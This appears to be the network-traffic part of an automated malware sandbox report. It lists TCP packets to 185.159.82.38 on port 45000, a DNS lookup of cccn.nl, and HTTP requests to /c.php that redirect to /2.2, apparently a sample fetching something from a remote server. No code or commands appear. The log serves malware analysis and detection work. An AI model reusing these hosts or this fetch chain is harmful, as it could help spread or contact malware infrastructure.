Mai 28, 2017 17:19:51.015399933 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.015435934 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.089848995 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.089878082 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.090152025 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.090198994 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.091567039 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.091597080 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.091826916 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.091875076 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.092251062 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.092269897 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.092680931 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.092720985 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.097778082 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.098032951 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.098078966 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.106874943 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.106904030 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.107132912 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.107178926 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.111257076 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.111507893 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.111552954 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.133716106 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.134040117 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.134077072 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.145489931 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.145834923 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.145862103 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.152195930 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.152225018 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.152559996 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.152586937 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.159396887 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.159532070 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.159568071 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.160038948 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.160069942 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.160193920 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.160223961 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.173832893 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.173855066 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.173995972 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.174022913 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.207982063 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.208009958 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.208019972 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.208219051 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.208261967 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.210056067 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.210297108 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.210340023 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.212852001 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.212882042 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.212893963 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.213140965 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.213186979 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.215878010 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.215909004 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.216130018 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.216173887 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.218471050 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.218678951 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.218720913 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.218905926 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.218935966 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.219194889 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.219232082 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.219619036 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.219829082 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.219867945 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.220601082 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.220628977 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.220772028 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.220810890 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.226483107 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.226512909 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.226731062 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.226775885 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.246036053 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.246067047 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.246074915 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.246263027 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.246306896 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.264993906 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.265206099 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.265249014 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.292817116 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.292848110 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.292982101 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.293010950 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.313031912 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.313397884 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.313420057 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.333051920 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.333071947 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.333148003 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.333173037 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.335000038 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.335309029 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.335328102 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.387063980 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.387082100 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.387212992 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.387233019 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.393774986 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.393791914 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.394119978 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.394144058 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.414021969 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.414038897 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.414043903 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.414231062 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.414257050 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.429514885 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.429894924 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.429917097 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.442948103 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.442981005 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.443167925 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.443192959 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.482846975 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.482990026 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.483016968 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.497926950 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.497945070 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.498284101 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.498313904 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.507572889 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.508116961 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.508147001 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.520925999 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.520946026 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.521364927 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.521389008 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.553018093 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.553212881 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.553255081 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.568125963 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.568156958 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.568362951 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.568406105 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.581593037 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.581788063 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.581830978 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.599704981 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.599734068 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.599956989 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.599999905 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.624140978 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.624386072 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.624428988 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.637482882 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.637514114 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.637747049 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.637810946 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.652961969 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.653209925 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.653254032 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.701993942 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.702025890 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.702136993 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.702164888 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.715821981 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.715853930 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.716100931 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.716144085 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.746495008 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.746526957 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.746819973 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.746857882 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.748189926 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.748347044 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.748385906 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.760118008 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.760148048 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.760339975 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.760382891 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.795573950 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.795819998 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.795862913 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.804805040 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.804825068 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.805053949 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.805099010 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.857969999 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.858180046 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.858222961 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.871356010 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.871387005 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.871602058 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.871644974 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.885524035 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.885693073 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.885729074 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.899111986 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.899142027 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.899363995 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.899408102 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.912291050 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.912589073 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.912631989 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.940246105 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.940279007 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.940536022 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.940578938 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.990044117 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.990298986 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.990340948 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.997037888 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.997067928 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.997272968 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.997317076 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.003530979 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.003792048 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.003834009 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.037345886 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.037378073 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.037606001 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.037652016 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.057187080 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.057218075 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.057365894 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.057398081 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.083897114 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.083925962 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.084079981 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.084108114 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.097306013 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.097477913 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.097503901 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.144052029 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.144078970 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.144179106 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.144207001 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.149408102 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.149542093 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.149565935 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.163343906 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.163371086 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.163474083 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.163497925 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.202692986 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.203116894 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.203150988 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.203948975 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.203977108 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.204400063 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.204442024 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.223489046 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.223933935 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.223959923 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.233644009 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.233659983 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.233953953 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.233973980 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.273379087 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.273582935 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.273614883 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.286787033 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.286802053 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.287096024 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.287118912 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.311897993 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.312302113 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.312330961 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.342700005 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.342727900 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.342926979 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.342966080 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.373136997 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.373323917 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.373362064 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.387934923 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.387964964 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.388156891 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.388197899 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.404840946 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.405131102 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.405174017 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.437968016 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.437998056 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.438222885 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.438266039 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.461354971 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.461564064 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.461606026 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.474941015 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.474960089 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.475235939 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.475280046 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.670805931 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:52.670850992 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:52.874363899 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:56.116442919 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:56.116570950 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:56.195676088 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:56.195708036 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:56.195823908 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:56.195841074 MESZ	45000	49235	185.159.82.38	192.168.1.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mai 28, 2017 17:18:54.833045006 MESZ	52401	53	192.168.1.16	8.8.8.8
Mai 28, 2017 17:18:55.158092022 MESZ	53	52401	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mai 28, 2017 17:18:54.833045006 MESZ	192.168.1.16	8.8.8.8	0xb2c8	Standard query (0)	cccn.nl	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Mai 28, 2017 17:18:55.158092022 MESZ	8.8.8.8	192.168.1.16	0xb2c8	No error (0)	cccn.nl		46.21.169.110	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cccn.nl

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Mai 28, 2017 17:18:55.243801117 MESZ	49234	80	192.168.1.16	46.21.169.110	GET /c.php HTTP/1.1 Host: cccn.nl Connection: Keep-Alive	0
Mai 28, 2017 17:18:55.446979046 MESZ	80	49234	46.21.169.110	192.168.1.16	HTTP/1.1 302 Found Date: Sun, 28 May 2017 15:18:49 GMT Server: Apache/2 Location: http://cccn.nl/2.2 Vary: User-Agent Content-Length: 0 Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Content-Type: text/html	0
Mai 28, 2017 17:18:55.450790882 MESZ	49234	80	192.168.1.16	46.21.169.110	GET /2.2 HTTP/1.1 Host: cccn.nl	0
